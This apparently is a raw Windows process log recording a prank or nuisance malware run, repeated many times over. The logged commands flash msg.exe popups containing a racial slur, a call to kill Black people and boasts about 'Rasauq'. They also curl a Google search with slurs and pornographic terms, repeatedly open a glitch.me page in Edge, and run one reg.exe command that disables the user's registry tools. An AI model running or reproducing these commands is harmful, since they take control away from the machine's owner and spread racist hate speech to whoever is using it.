C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4140,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4852 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4808,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5136,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4060 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5324,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5540,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5748,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5900,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6048,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=5728 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6224,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6576,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6752,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6904,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=6588 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7060,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7088 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7284,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7452,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7460 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6912,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7412 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7788,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=7796 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8124,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8132 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7828,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8296 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8592,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8604 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8628,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8784 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=9072,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=9304,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9312 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9560,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9568 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9828,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9844 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=10052,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10060 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
